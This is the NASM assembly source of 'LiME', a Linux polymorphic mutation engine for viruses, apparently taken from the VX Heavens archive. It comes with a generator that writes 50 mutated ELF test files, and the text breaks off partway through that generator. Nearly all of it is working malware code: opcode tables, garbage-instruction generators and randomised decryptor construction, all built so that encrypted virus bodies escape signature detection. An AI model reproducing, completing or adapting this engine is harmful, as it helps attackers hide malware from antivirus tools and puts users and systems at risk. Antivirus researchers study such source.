Virus.Linux.Lime - Linux Mutation Engine - Source Code

; This file passed through VX Heavens (http://vx.org.ua)
; ***************************************************************
;  To compile [LiME] under Linux with NASM... Follow as:
;  nasm -f elf lime-gen.s
;  ld -e main lime-gen.o -o lime-gen
; ***************************************************************

section .data
global main

; ***************************************************************
;  Linux Mutation Engine (source code)
;  [LiME] Version: 0.2.0                 Last update: 2001/02/28
;  Written by zhugejin at Taipei, Taiwan.       Date: 2000/10/10
;  E-mail: zhugejin.bbs@bbs.csie.nctu.edu.tw
;  WWW: http://cvex.fsn.net
; ***************************************************************

; Input:
;       EBX = pointer to memory buffer where LiME will store decryptor
;         and encrypted data
;       ECX = pointer to the data, u want to encrypt
;       EDX = size of data, u want to encrypt
;       EBP = delta offset
;
; Output:
;   ECX = address of decryptor+encrypted data
;       EDX = size of decryptor+encrypted data

LIME_BEGIN:
    dd LIME_SIZE            ; size of [LiME]

lime_pre_opcod_tab db 10000000b ; add
           db 10101000b ; sub
                   db 10110000b ; xor
                   db 10000000b ; add

lime_enc_opcod_tab db  80h,10000000b, 2ah,11000001b ; add/sub
           db  80h,10101000b, 02h,11000001b ; sub/add
           db  80h,10110000b, 32h,11000001b ; xor/xor
           db  82h,10000000b, 2ah,11000001b ; add/sub
           db  82h,10101000b, 02h,11000001b ; sub/add
           db  82h,10110000b, 32h,11000001b ; xor/xor
           db 0c0h,10000000b,0d2h,11001000b ; rol/ror
           db 0c0h,10001000b,0d2h,11000000b ; ror/rol

           db 0d0h,10000000b,0d0h,11001000b ; rol/ror
           db 0d0h,10001000b,0d0h,11000000b ; ror/rol
           db 0f6h,10010000b,0f6h,11010000b ; not/not
           db 0f6h,10011000b,0f6h,11011000b ; neg/neg
           db 0feh,10000000b,0feh,11001000b ; inc/dec
           db 0feh,10001000b,0feh,11000000b ; dec/inc

           db  00h,10000000b, 2ah,11000001b ; add/sub
           db  28h,10000000b, 02h,11000001b ; sub/add
           db  30h,10000000b, 32h,11000001b ; xor/xor
            ;--------------------------------------------
           db  10h,10000000b, 1ah,11000001b ; adc/sbb
           db  18h,10000000b, 12h,11000001b ; sbb/adc

           db  80h,10010000b, 1ah,11000001b ; adc/sbb
           db  80h,10011000b, 12h,11000001b ; sbb/adc
           db  82h,10010000b, 1ah,11000001b ; adc/sbb
           db  82h,10011000b, 12h,11000001b ; sbb/adc

lime_zero_reg_opcod_tab db 29h,00011000b        ; sub reg,reg
                        db 2bh,00011000b        ; sub reg,reg
                        db 31h,00011000b        ; xor reg,reg
                        db 33h,00011000b        ; xor reg,reg
lime_init_reg_opcod_tab db 81h,11000000b        ; add reg,xxxxxxxx
                        db 81h,11001000b        ; or reg,xxxxxxxx
                        db 81h,11110000b        ; xor reg,xxxxxxxx
                        db 81h,11000000b        ; add reg,xxxxxxxx

;-----------------------------------------------
LIME_make_tsh_cod   dd lime_make_tsh_cod
LIME_make_noflags_cod   dd lime_make_noflags_cod
LIME_set_disp_reg   dd lime_set_disp_reg
LIME_save_edi       dd lime_save_edi
@   equ $
LIME_rnd        dd lime_rnd
LIME_rnd_reg        dd lime_rnd_reg
LIME_rnd_al     dd lime_rnd_al
LIME_rnd_eax_and_al dd lime_rnd_eax_and_al
LIME_rnd_esi        dd lime_rnd_esi
;-----------------------------------------------

lime_add4_reg_opcod_tab db 11000000b,11000000b,04h,-4h  ; add/add
            db 11000000b,11101000b,-4h,04h  ; add/sub
            db 11101000b,11101000b,-4h,04h  ; sub/sub
            db 11101000b,11000000b,04h,-4h  ; sub/add

lime_mk_mov_cod_addr dw lime_mmc1-@,lime_mmc2-@,lime_mmc3-@
lime_mk_inc_cod_addr dw lime_mic1-@,lime_mic2-@,lime_mic3-@
lime_mk_jxx_cod_addr dw lime_mjc1-@,lime_mjc2-@

lime_mk_tsh_cod_addr dw lime_mtc1-@,lime_mtc2-@,lime_mtc3-@,lime_mtc4-@
                     dw lime_mtc5-@,lime_mtc6-@,lime_mtc7-@,lime_mtc8-@
             dw lime_mtc9-@
;            dw lime_simd-@
;            dw lime_3dnow-@

jxx_addr dd 0
ret_addr dd 0
pre_addr dd 0
pre_count db 0

lime_rnd_val dd 0

orig_reg db 0
disp_reg db 0
temp_reg db 0
key_reg  db 0

    ;   +------------> make no-flags code
    ;   |+-----------> *reserved* for SIMD Instruction
    ;   ||+----------> *reserved* for 3DNow! Instruction
    ;   |||   +------> xchg disp_reg with orig_reg
    ;   |||   |
para_eax db 00000000b   ; parameters of LiME
para_ebx dd 0       ; address of buffer for new decryptor
para_ecx dd 0       ; begin of code to be decrypted
para_edx dd 0       ; size of code to be decrypted
para_ebp dd 0       ; displacement of decryptor
para_esp dd 0

    ;   +--------------------> byte / dword
    ;   |+-------------------> mod := (disp32/disp8)
    ;   ||+------------------> *not used*
    ;   |||+-----------------> *not used*
    ;   ||||+----------------> inc reg / dec reg
    ;   |||||++--------------> *not used*
    ;   |||||||+-------------> clc / stc
enc_type dd 00000000b

adr_ndx dd 0
adr_0   dd 0,0,0,0,0,0,0,0
adr_1   dd 0,0,0,0,0,0,0,0
adr_2   dd 0,0,0,0,0,0,0,0
adr_3   dd 0,0,0,0,0,0,0,0

lime_mmx_opcod_tab:
db  60h, 61h, 62h, 63h, 64h, 65h, 66h, 67h, 68h, 69h, 6ah, 6bh, 6eh, 6fh
db  74h, 75h, 76h, 6eh, 6fh,0d1h,0d2h,0d3h,0d5h,0d8h,0d9h,0dbh,0dch,0ddh
db 0dfh,0e1h,0e2h,0e5h,0e8h,0e9h,0ebh,0ech,0edh,0efh,0f1h,0f2h,0f3h,0f5h
db 0f8h,0f9h,0fah,0fch,0fdh,0feh

; ---------------------------------------------------------------

LIME:
        pushf
        cld

        mov edi,ebx

    push ebp
        call lime_reloc
lime_reloc:
        pop ebp
        sub ebp,lime_reloc-@
        pop dword [ebp-@+para_ebp]
        mov [ebp-@+para_ebx],ebx
        mov [ebp-@+para_ecx],ecx
        mov [ebp-@+para_edx],edx
    mov [ebp-@+para_esp],esp

    call lime_make_prefix_decrypt   ;
    mov [ebp-@+pre_addr],esp

    mov al,3
    call [ebp-@+LIME_rnd_eax_and_al]
        mov [ebp-@+adr_ndx],eax
        xchg ecx,eax
        inc ecx
        lea esi,[ebp-@+adr_0]
lime_make_next_decrypt:
        call lime_make_decrypt          ;
    ror dword [ebp-@+enc_type],8
        loop lime_make_next_decrypt

        call lime_encrypt               ;

        mov ecx,[ebp-@+para_ebx]
        mov edx,edi
        sub edx,ecx

    mov esp,[ebp-@+para_esp]
        popf
        ret

; ---------------------------------------------------------------

lime_make_prefix_decrypt:
    pop dword [ebp-@+ret_addr]
        call [ebp-@+LIME_make_tsh_cod]

    mov al,7
    call [ebp-@+LIME_rnd_eax_and_al]
    add al,7
    mov [ebp-@+pre_count],al
    xchg ecx,eax
mk_next_prefix_decrypt:
        call [ebp-@+LIME_make_tsh_cod]
        call [ebp-@+LIME_set_disp_reg]

        call lime_make_mov_cod
    push edi            ; p0
        stosd

    call lime_make_xchg_cod_rnd

    mov al,02h
    call [ebp-@+LIME_rnd_eax_and_al]
        add al,81h      ; (add/sub/xor) dword [reg+(xxxxxx)xx],xxxxxxxx
        stosb
        push eax
        mov al,03h
        call [ebp-@+LIME_rnd_al]
        lea ebx,[ebp-@+lime_pre_opcod_tab]
    xlatb
        or al,[ebp-@+disp_reg]
        stosb
        pop ebx
    push edi            ; p1
        call [ebp-@+LIME_rnd]
        stosd
    jp lmpd_a1
    xor byte [edi-05h],11000000b
    sub edi,byte 03h
lmpd_a1:
        call [ebp-@+LIME_rnd]
        stosd
    cmp bl,83h
    jnz lmpd_a2
    sub edi,byte 03h
lmpd_a2:

        loop mk_next_prefix_decrypt

        call [ebp-@+LIME_make_tsh_cod]
    push dword [ebp-@+ret_addr]
        ret

; ---------------------------------------------------------------

lime_make_decrypt:
        push ecx
        call [ebp-@+LIME_make_tsh_cod]
        call [ebp-@+LIME_set_disp_reg]

;   mov al,0cch
;   stosb                   ; *test*

        call lime_make_mov_cod
    call [ebp-@+LIME_save_edi]      ; a0 = disp value
        stosd

    call [ebp-@+LIME_make_tsh_cod]
    call [ebp-@+LIME_rnd]
    and al,11111001b
    mov [ebp-@+enc_type],al
    mov bl,al
    rol al,1
    mov ah,al
    call [ebp-@+LIME_rnd_reg]
    mov [ebp-@+key_reg],al
    shl ah,3
    or al,ah
    or al,0b0h      ; mov reg,key
    stosb
    call [ebp-@+LIME_rnd]
    mov [esi+4*6],eax       ; a7 = key
    stosd
    test bl,10000000b
    jnz lmd_a1
    sub edi,byte 03h
lmd_a1:
    call [ebp-@+LIME_rnd]
    and al,00000010b
    mov [ebp-@+para_eax],al
    call lime_make_xchg_cod_rnd

    call [ebp-@+LIME_save_edi]      ; a1 = address of loop
    call [ebp-@+LIME_make_tsh_cod]

    mov al,[ebp-@+disp_reg]
        mov [ebp-@+orig_reg],al

        push esi
        lea esi,[ebp-@+lime_enc_opcod_tab]
        mov al,22
        call [ebp-@+LIME_rnd_esi]
    add esi,eax
    cmp eax,byte 16*2
    pushf
        lodsd
    test bl,10000000b
    jz lmd_a2
    or eax,00010001h
lmd_a2:
    popf
    push eax
    jbe mk_no_cf
    mov al,bl
;   and al,01h
    or al,0f8h      ; clc / stc
    stosb
    call [ebp-@+LIME_make_noflags_cod]
mk_no_cf:
    pop eax
        pop esi
    mov bh,bl
    and bh,01000000b
    sub ah,bh
        mov [esi],eax           ; a2 = decryptic type
        add esi,byte 04h
        or ah,[ebp-@+disp_reg]
    cmp al,40h
    jae lmd_a3
    mov dh,[ebp-@+key_reg]
    rol dh,3
    or ah,dh
lmd_a3:
        stosw           ; (add/sub/xor...) (b/w) [reg+(xxxxxx)xx],key
    xchg edx,eax
    call [ebp-@+LIME_rnd]
    jp lmd_a4
    and byte [edi-01h],11111000b
    or byte [edi-01h],00000100b
    and al,11000000b
    or al,00100000b
    or al,[ebp-@+disp_reg]
    stosb
lmd_a4:
        call [ebp-@+LIME_save_edi]      ; a3 = address of displacement
        call [ebp-@+LIME_rnd]
        stosd
    test bl,01000000b
    jz lmd_a5
    sub edi,byte 03h
lmd_a5:
    cmp dl,0d0h
    jae mk_no_val
    cmp dl,40h
    jb mk_no_val
        call [ebp-@+LIME_rnd]
    and al,7fh
    stosd
    cmp dl,81h
    jz lmd_a6
    and eax,byte 7fh
    sub edi,byte 03h
lmd_a6:
    mov [esi+4*3],eax       ; a7 = key
mk_no_val:

    call lime_make_xchg_cod_rnd
        call lime_make_inc_cod  ; (inc/dec) reg
        call lime_make_xchg_cod_rnd

        mov ax,0f881h           ; cmp reg,xxxxxxxx
        or ah,[ebp-@+disp_reg]
        stosw
    call lime_aox_eax
        call [ebp-@+LIME_save_edi]      ; a4 = address of "cmp reg,xxxxxxxx"
        stosd

    call [ebp-@+LIME_make_noflags_cod]

    test byte [ebp-@+para_eax],00000010b
    jz mk_no_xchg
        mov al,04h
    call [ebp-@+LIME_rnd_eax_and_al]
    add al,87h      ; xchg orig_reg,disp_reg
    stosb
    mov al,[ebp-@+orig_reg]
    mov ah,al
    xchg [ebp-@+disp_reg],al
    dec edi
    cmp ah,al
    jz mk_no_xchg
    inc edi
    rol ah,3
    or al,ah
    or al,11000000b
    cmp byte [edi-01h],87h
    jnz lmd_a7
    call lime_xchg_reg
lmd_a7:
    stosb
    call [ebp-@+LIME_make_noflags_cod]
mk_no_xchg:
    and byte [ebp-@+para_eax],11111101b

        call lime_make_jz_cod   ; jxx (xxxxxx)xx
        call [ebp-@+LIME_save_edi]      ; a5 = address of "jxx xx"

        call [ebp-@+LIME_make_noflags_cod]

        mov al,0e9h     ; jmp xxxxxxxx
        stosb
        mov eax,[esi-5*4]   ; address of loop
        sub eax,edi
        dec eax
    cmp eax,byte -80h
        jae mk_short_jmp
        sub eax,byte 03h
        stosd
        jmp short mk_jmp_end
mk_short_jmp:
        mov byte [edi-01h],0ebh ; jmp xx
        stosb
mk_jmp_end:

    call lime_rnd_trash
        call [ebp-@+LIME_save_edi]      ; a6

        push esi
        mov esi,[esi-4*2]   ; address of "jxx xx"
        mov eax,edi
        sub eax,esi
        cmp byte [esi-02h],00h
        jnz mk_jz_a
        sub esi,byte 03h
mk_jz_a:
        mov [esi-01h],al
        pop esi
    add esi,byte 04h

        pop ecx
        ret

; -------------------------------
;   ...
;   mov reg,xxxxxxxx <---- a0
;   ...
;a1:
;   ...
;   xor [eax+xx],key <---- a7
;   ^^^(a2)  ^^a3
;   ...
;   inc eax
;   ...
;   cmp eax,xxxxxxxx <---- a4
;   ...
;   jz a6
;a5:
;   ...
;   jmp a1
;   ...
;a6:
; -------------------------------

; ---------------------------------------------------------------

lime_encrypt:
        mov ecx,[ebp-@+para_edx]
        mov esi,[ebp-@+para_ecx]
        repz movsb

        push edi
calc_disp:
    rol dword [ebp-@+enc_type],8
    mov eax,0aa9090ach
    test byte [ebp-@+enc_type],10000000b
    jz le_a1
    or eax,01000001h
le_a1:
    mov [ebp-@+enc_buff-01h],eax

        lea esi,[ebp-@+adr_0]
        imul ebx,[ebp-@+adr_ndx],byte 4*8
        lea edx,[esi+ebx]
    mov eax,edi
    mov esi,edi
    sub eax,[edx+4*6]
    and al,11111100b
    add eax,byte 04h
    sub esi,eax
    mov eax,esi

        sub eax,[ebp-@+para_ebx]
        add eax,[ebp-@+para_ebp]
        mov ebx,[edx+4*3]
    mov ecx,[ebx]
    test byte [ebp-@+enc_type],01000000b
    jz le_a2
    movsx ecx,cl
le_a2:
        sub eax,ecx
        mov ecx,[edx+4*7]   ; decryptic value

    test byte [ebp-@+enc_type],00001000b
    jnz le_a3
        mov ebx,[edx]       ; address of "mov reg,xxxxxxxx"
        mov [ebx],eax
        add eax,edi
        sub eax,esi
        mov ebx,[edx+4*4]   ; address of "cmp reg,xxxxxxxx"
    jmp short le_a4
le_a3:
        mov ebx,[edx+4*4]   ; address of "cmp reg,xxxxxxxx"
        mov [ebx],eax
        add eax,edi
        sub eax,esi
        mov ebx,[edx]       ; address of "mov reg,xxxxxxxx"
le_a4:
        mov [ebx],eax

;       jmp _test1_lime_encrypt         ; *test*
        mov eax,[edx+4*2]       ; decryptic type
    shr eax,16
        mov [ebp-@+enc_buff],ax
        mov ebx,edi
        mov edi,esi

    mov al,[ebp-@+enc_type]
;   and al,1
    or al,0f8h      ; clc / stc
    mov [ebp-@+enc_buff-02h],al

encrypt_prog:
    db 90h
        lodsb           ; 0ach
enc_buff db 90h,90h
        stosb           ; 0aah
    cmp esi,ebx
        jb encrypt_prog
_test1_lime_encrypt:

        cmp byte [ebp-@+adr_ndx],0
        jz lime_prefix_encrypt
        dec byte [ebp-@+adr_ndx]
        jmp calc_disp

; ---------------------------------------------------------------

lime_prefix_encrypt:
;   jmp _test2_lime_encrypt         ; *test*
    movzx ecx,byte [ebp-@+pre_count]
    mov edi,[ebp-@+pre_addr]
lpe_next:
    mov al,1fh
    call [ebp-@+LIME_rnd_eax_and_al]
        add eax,[ebp-@+adr_0+4*1]   ; address of loop
    mov ebx,eax
        sub eax,[ebp-@+para_ebx]
        add eax,[ebp-@+para_ebp]
    mov esi,[edi]
    mov edx,[esi]
    push esi
    add esi,byte 04h
    test byte [esi-05h],01000000b
    jz lpe_a1
    movsx edx,dl
    sub esi,byte 03h
lpe_a1:
        sub eax,edx
    mov edx,[edi+04h]
    mov [edx],eax
    add edi,byte 08h
        mov edx,[esi]
    pop esi
        mov eax,[esi-02h]
    cmp al,83h
    jnz lpe_a2
    movsx edx,dl
lpe_a2:
        and ah,00111000b
        jz lpe_sub
        cmp ah,00101000b
        jz lpe_add
        xor [ebx],edx
        loop lpe_next
        jmp short lime_encrypt_end
lpe_sub:
        sub [ebx],edx
        loop lpe_next
        jmp short lime_encrypt_end
lpe_add:
        add [ebx],edx
        loop lpe_next
_test2_lime_encrypt:

lime_encrypt_end:
        pop edi
    call lime_rnd_trash
        ret

; ---------------------------------------------------------------

lime_set_disp_reg:
    push edx
lsdr_l:
    mov al,111b
        call [ebp-@+LIME_rnd_al]
        cmp al,100b
        jz lsdr_l
    mov dl,[ebp-@+key_reg]
    test bl,10000000b
    jnz lsdr_a
    and dl,011b
lsdr_a:
    cmp al,dl
    jz lsdr_l
    cmp al,[ebp-@+disp_reg]
    jz lsdr_l
        mov [ebp-@+disp_reg],al
        mov [ebp-@+temp_reg],al
    pop edx
        ret

lime_rnd:
        push edx
        rdtsc
        xor eax,[ebp-@+lime_rnd_val]
        adc eax,edi
    neg eax
    sbb eax,edx
    rcr eax,1
        xor [ebp-@+lime_rnd_val],eax
        pop edx
        ret

lime_rnd_eax_and_al:
    push edx
    movzx edx,al
    call [ebp-@+LIME_rnd]
    and eax,edx
    pop edx
    ret

lime_rnd_al:
    push edx
    mov edx,eax
lra_l:
    call [ebp-@+LIME_rnd]
    cmp al,dl
    ja lra_l
    mov dl,al
    xchg eax,edx
    pop edx
    ret

lime_rnd_esi:
    and eax,byte 07fh
    call [ebp-@+LIME_rnd_al]
        add eax,eax
        add esi,eax
        ret

lime_rnd_addr:
    call [ebp-@+LIME_rnd_esi]
    movzx eax,word [esi]
    lea esi,[eax+@]
    ret

lime_save_edi:
        mov [esi],edi
        add esi,byte 04h
        ret

lime_rnd_reg_dd:
    mov al,01h
lime_rnd_reg:
    push ecx
    push edx
        xchg edx,eax
lrr_l:
    mov al,111b
    call [ebp-@+LIME_rnd_al]
    mov ah,al
        test dl,01h
        jnz lrr_w
        and al,011b
lrr_w:
        cmp al,100b
        jz lrr_l
        cmp al,[ebp-@+disp_reg]
        jz lrr_l
    cmp al,[ebp-@+temp_reg]
    jz lrr_l
    and al,011b
    mov cl,[ebp-@+key_reg]
    and cl,011b
    cmp al,cl
    jz lrr_l
    mov dl,ah
    xchg eax,edx
    pop edx
    pop ecx
        ret

lime_rnd_trash:
    push ecx
    mov al,3
    call [ebp-@+LIME_rnd_eax_and_al]
    or al,04h
    xchg ecx,eax
lrt_l:
    call [ebp-@+LIME_rnd]
    stosb
    loop lrt_l
    pop ecx
    ret

lime_rnd_rm:
    push edx
    xor edx,edx
    mov dl,al
    mov ah,al
    rol ah,3
    mov al,[edi-01h]
    call [ebp-@+LIME_rnd_reg]
    or ah,al
    rol ah,3
    mov al,[edi-01h]
    call [ebp-@+LIME_rnd_reg]
    or al,ah
    stosb
    cmp dl,11b
    jz lrr_a2
    and al,11000111b
    push eax
    cmp eax,edi
    jp lrr_a1
    or ah,00000100b
    mov [edi-01h],ah
    mov ah,al
    mov al,0ffh
    call [ebp-@+LIME_rnd_al]
    and al,11111000b
    xor al,ah
    stosb
lrr_a1:
    call [ebp-@+LIME_rnd]
    stosd
    pop eax
    cmp al,00000101b
    jz lrr_a2
    cmp dl,10b
    je lrr_a2
    sub edi,byte 04h
    add edi,edx
lrr_a2:
    pop edx
        ret

lime_xchg_reg:
    push edx
    cmp eax,edi
    jp lxr_e
    and al,00111111b
    mov edx,eax
    shr al,3
    shl dl,3
    or al,dl
    or al,11000000b
lxr_e:
    pop edx
    ret

lime_aox_eax:
    cmp eax,edi
    jp lae_e
    test byte [edi-01h],111b
    jnz lae_e
    dec edi
    mov al,[edi]
    dec edi
    and al,00111000b
    or al,00000101b
    stosb
lae_e:
    ret

; ---------------------------------------------------------------

lime_make_mov_cod:
        push esi
        lea esi,[ebp-@+lime_mk_mov_cod_addr]
        mov al,02h
        call lime_rnd_addr
        call esi
        pop esi
        ret
lime_mmc1:
        mov al,0b8h     ; mov reg,xxxxxxxx
        or al,[ebp-@+disp_reg]
        stosb
        ret
lime_mmc2:          ; set reg=0 / (add/or/xor) reg,xx
        lea esi,[ebp-@+lime_zero_reg_opcod_tab]
        mov al,03h
        call [ebp-@+LIME_rnd_esi]
        lodsd
        or ah,[ebp-@+disp_reg]
        rol ah,3
        or ah,[ebp-@+disp_reg]
        stosw
    call lime_make_xchg_cod_rnd
    lea esi,[ebp-@+lime_init_reg_opcod_tab]
        mov al,03h
        call [ebp-@+LIME_rnd_esi]
        lodsd
        or ah,[ebp-@+disp_reg]
        stosw
    call lime_aox_eax
        ret
lime_mmc3:
    mov ax,0a08dh       ; lea reg,xxxxxxxx
    or ah,[ebp-@+disp_reg]
    rol ah,3
    stosw
    ret

lime_make_xchg_cod_rnd:
    cmp eax,edi
    jp lime_mxc_e
    or byte [ebp-@+para_eax],00000010b
    call [ebp-@+LIME_make_tsh_cod]
    mov dl,[ebp-@+disp_reg]
    mov al,07h
    call [ebp-@+LIME_rnd_eax_and_al]
    test byte [ebp-@+key_reg],011b
    jz lime_mxc_a1
    test al,100b
    jnz lime_mxc_a6
lime_mxc_a1:
    and al,011b
    test al,01b
    jz lime_mxc_a4
    cmp dl,101b
    jnz lime_mxc_a2
    and al,01b
lime_mxc_a2:
    add al,8ah
    stosb
    call [ebp-@+LIME_set_disp_reg]
    rol al,3
    or al,dl
    stosb
    cmp byte [edi-02h],8dh
    jz lime_mxc_a3
    or byte [edi-01h],11000000b
lime_mxc_a3:
    jmp short lime_mxc_e
lime_mxc_a4:
    add ax,1887h        ; mov ah,00011regb
    stosb
    or ah,[ebp-@+disp_reg]
    rol ah,3
    call [ebp-@+LIME_set_disp_reg]
    or al,ah
    cmp byte [edi-01h],87h
    jnz lime_mxc_a5
    call lime_xchg_reg
lime_mxc_a5:
    stosb
lime_mxc_e:
    call [ebp-@+LIME_make_tsh_cod]
    ret
lime_mxc_a6:
    call [ebp-@+LIME_set_disp_reg]
    cmp dl,000b
    jz lime_mxc_a7
    mov al,90h
    or al,dl
    mov byte [ebp-@+disp_reg],00h
    jmp short lime_mxc_a5
lime_mxc_a7:
    call [ebp-@+LIME_set_disp_reg]
    or al,90h
    jmp short lime_mxc_a5

; ---------------------------------------------------------------

lime_make_inc_cod:
        push esi
        lea esi,[ebp-@+lime_mk_inc_cod_addr]
        mov al,01h
        call lime_rnd_addr
    mov al,bl
    and al,00001000b
        or al,[ebp-@+disp_reg]
    test bl,10000000b
    jz lime_mic_t
    lea esi,[ebp-@+lime_mic3]
lime_mic_t:
        call esi
        pop esi
        ret
lime_mic1:
        or al,40h       ; (inc/dec) reg
        stosb
        ret
lime_mic2:
    or al,11000000b
    mov ah,al
    mov al,0ffh     ; (inc/dec) reg
        stosw
        ret
lime_mic3:          ; (add/sub) reg,xx / (add/sub) reg,xx
    mov al,81h
    stosb
        lea esi,[ebp-@+lime_add4_reg_opcod_tab]
        mov al,03h
        call [ebp-@+LIME_rnd_esi]
    add esi,eax
    mov edx,[esi]
    mov al,dl
    or al,[ebp-@+disp_reg]
    stosb
    call lime_aox_eax
    call [ebp-@+LIME_rnd]
    stosd
    xchg ecx,eax
    push edx
    call lime_make_xchg_cod_rnd
    pop edx
    mov al,81h
    stosb
    mov al,dh
    or al,[ebp-@+disp_reg]
    stosb
    call lime_aox_eax
    cmp dh,dl
    jnz lime_mic3_a1
    neg ecx
lime_mic3_a1:
    xchg eax,edx
    shr eax,16
    test bl,00001000b
    jz lime_mic3_a2
    shr eax,8
lime_mic3_a2:
    movsx eax,al
    add eax,ecx
    stosd
    ret

; ---------------------------------------------------------------

lime_make_jz_cod:
        push esi
        lea esi,[ebp-@+lime_mk_jxx_cod_addr]
        mov al,01h
        call lime_rnd_addr
    mov al,01h
    call [ebp-@+LIME_rnd_al]
    test bl,00001000b
        call esi
        pop esi
        ret
lime_mjc1:
    jz lime_mjc1_a
    mov al,0ffh
lime_mjc1_a:
        add al,73h      ; jz(ae/b) xx
        stosw
        ret
lime_mjc2:
    mov ah,al
    jz lime_mjc2_a
    mov ah,0ffh
lime_mjc2_a:
        add ah,83h      ; jz(ae/b) xxxxxxxx
    mov al,0fh
        stosw
        xor eax,eax
        stosd
        ret

; ---------------------------------------------------------------

lime_make_noflags_cod:
        or byte [ebp-@+para_eax],10000000b
    call [ebp-@+LIME_make_tsh_cod]
        and byte [ebp-@+para_eax],01111111b
    ret

lime_make_tsh_cod:
;   ret                 ; *test*
    push ebx
        push ecx
    push edx
        push esi
    mov al,3
    call [ebp-@+LIME_rnd_eax_and_al]
        or eax,byte 01h
        xchg ecx,eax
lmtc_l:
        lea esi,[ebp-@+lime_mk_tsh_cod_addr]
    xor eax,eax
    mov al,08h
        test byte [ebp-@+para_eax],10000000b
        jz lmtc_t1
        mov al,03h
lmtc_t1:
    call [ebp-@+LIME_rnd_al]
    rol eax,1
        add esi,eax
    movzx eax,word [esi]
    lea esi,[eax+@]
        call [ebp-@+LIME_rnd]
        call esi
        mov esi,[ebp-@+jxx_addr]
        or esi,esi
        jz lmtc_t2
        mov eax,edi
        sub eax,esi
        cmp eax,byte 02h
        jbe lmtc_t2
        mov [esi-01h],al
        and dword [ebp-@+jxx_addr],byte 00h
lmtc_t2:
        loop lmtc_l
        and dword [ebp-@+jxx_addr],byte 00h
        pop esi
    pop edx
        pop ecx
    pop ebx
        ret

lime_mtc1:          ; 8087
    and al,00000100b
        or al,0d8h
        stosb
lmtc1_a1:
        mov al,ah
        and ah,00000111b
        cmp ah,00000101b
        jnz lmtc1_a2
        and al,00111111b
        stosb
    mov al,7fh
    call [ebp-@+LIME_rnd_eax_and_al]
        add eax,[ebp-@+para_ebp]
        stosd
        ret
lmtc1_a2:
        or al,11000000b
        stosb
        ret

lime_mtc2:
    mov al,0fh
    call [ebp-@+LIME_rnd_al]
    or al,80h
    cmp al,8dh      ; lea reg,[reg]
    jz lmtc2_a
    cmp al,8bh
    ja lime_mtc2
    cmp al,86h
    jb lime_mtc2
    stosb           ; (xchg/mov) reg,reg
    mov al,11b
    call lime_rnd_rm
    jmp short lime_mtc2
lmtc2_a:
    stosb
    mov al,10b
    call [ebp-@+LIME_rnd_al]
    call lime_rnd_rm
    ret

lime_mtc3:          ; MMX
        push eax
        mov al,0fh
        stosb
        lea ebx,[ebp-@+lime_mmx_opcod_tab]
    mov al,2fh
    call [ebp-@+LIME_rnd_al]
    xlatb
    stosb
        pop eax
        or al,11000000b
        stosb
        ret

lime_mtc4:
        and al,01h
        mov dl,al
        shl dl,3
        call [ebp-@+LIME_rnd_reg]
        or al,0b0h      ; mov reg,xxxxxx(xx)
        or al,dl
        stosb
        cmp al,0b8h
        jb lmtc4_a
        call [ebp-@+LIME_rnd]
        and eax,0bfff83ffh
        stosd
        ret
lmtc4_a:
        call [ebp-@+LIME_rnd]
        stosb
        ret

lime_mtc5:
        and al,03h
        or al,80h       ; (add/or/adc/sbb/and/sub/xor/cmp) reg,xx
        stosb
        call [ebp-@+LIME_rnd_reg]
        or al,11000000b
        stosb
        call [ebp-@+LIME_rnd]
        and eax,83ffbfffh
        stosd
        cmp byte [edi-06h],81h
        jz lime_mtc5_a
    sub edi,byte 03h
lime_mtc5_a:
;       ret

lime_mtc6:
        cmp dword [ebp-@+jxx_addr],byte 00h
        jnz lime_mtc4
    mov al,0fh
    call [ebp-@+LIME_rnd_eax_and_al]
        or al,70h       ; jxx xx
        stosw
        mov [ebp-@+jxx_addr],edi
        call lime_mtc5
        ret

lime_mtc7:
    jp lime_mtc7_a
        and al,01h
        or al,0feh      ; (inc/dec) reg
        stosb
        call [ebp-@+LIME_rnd_reg]
        and ah,00001000b
        or al,11000000b
        or al,ah
        stosb
        ret
lime_mtc7_a:
    call lime_rnd_reg_dd
    and ah,00001000b
        or ah,40h       ; (inc/dec) reg
        or al,ah
        stosb
        ret

lime_mtc8:
;   ret
    call lime_rnd_reg_dd
    mov dl,al
    mov [ebp-@+temp_reg],al
    or al,0b8h      ; mov reg,xxxxxxxx
    stosb
    call [ebp-@+LIME_rnd]
    stosd
    push edi
    push eax
    call [ebp-@+LIME_make_noflags_cod]
    call [ebp-@+LIME_rnd]
    and al,08h
    or al,40h       ; (inc/dec) reg
    or al,[ebp-@+temp_reg]
    stosb
    push eax
    call [ebp-@+LIME_make_noflags_cod]
    mov ax,0f881h       ; cmp reg,xxxxxxxx
    or ah,[ebp-@+temp_reg]
    stosw
    mov al,7fh
    call [ebp-@+LIME_rnd_eax_and_al]
    or al,10h
    pop edx
    test dl,08h
    pop edx
    jnz lime_mtc8_a1
    add eax,edx
        jmp short lime_mtc8_a2
lime_mtc8_a1:
    xchg eax,edx
        sub eax,edx
lime_mtc8_a2:
    stosd
    call [ebp-@+LIME_make_noflags_cod]
    mov al,[ebp-@+disp_reg]
    mov [ebp-@+temp_reg],al
    mov al,75h      ; jnz xx
    stosw
    cmp eax,edi
    jp lime_mtc8_a3
    pop eax
    sub eax,edi
    cmp eax,byte -80h
    jb lime_mtc8_a4
    mov [edi-01h],al
    ret
lime_mtc8_a3:
    pop eax
lime_mtc8_a4:
    push edi
    call lime_rnd_trash
    pop edx
    mov eax,edi
    sub eax,edx
    mov [edx-01h],al
    ret

lime_mtc9:          ; (add/or/adc/sbb/and/sub/xor/cmp) reg,reg
    call [ebp-@+LIME_rnd]
    and al,00111011b
    stosb
    call [ebp-@+LIME_rnd_reg]
    or al,00011000b
    rol al,3
    mov ah,al
    mov al,[edi-01h]
    call [ebp-@+LIME_rnd_reg]
    or al,ah
    stosb
    ret

; ---------------------------------------------------------------

LIME_END:
LIME_SIZE equ LIME_END-LIME_BEGIN

; ***************************************************************
;  [LiME] test files generator
; ***************************************************************

main:
        mov eax,4
        mov ebx,1
        mov ecx,gen_msg
        mov edx,gen_msg_len
        int 80h

        mov ecx,50
gen_l1:
        push ecx

        mov eax,8
        mov ebx,filename
        mov ecx,000111111101b   ; 000rwxrwxrwx
        int 80h

        push eax

        mov eax,0
        mov ebx,host_entry
        mov ecx,host
        mov edx,host_len
        mov ebp,[e_entry]
        call LIME

        pop ebx

        mov eax,4
        mov ecx,elf_head
        add edx,host_entry-elf_head
        mov [p_filsz],edx
        mov [p_memsz],edx
        int 80h

        mov eax,6
        int 80h

        lea ebx,[filename+1]
        inc byte [ebx+1]
        cmp byte [ebx+1],'9'
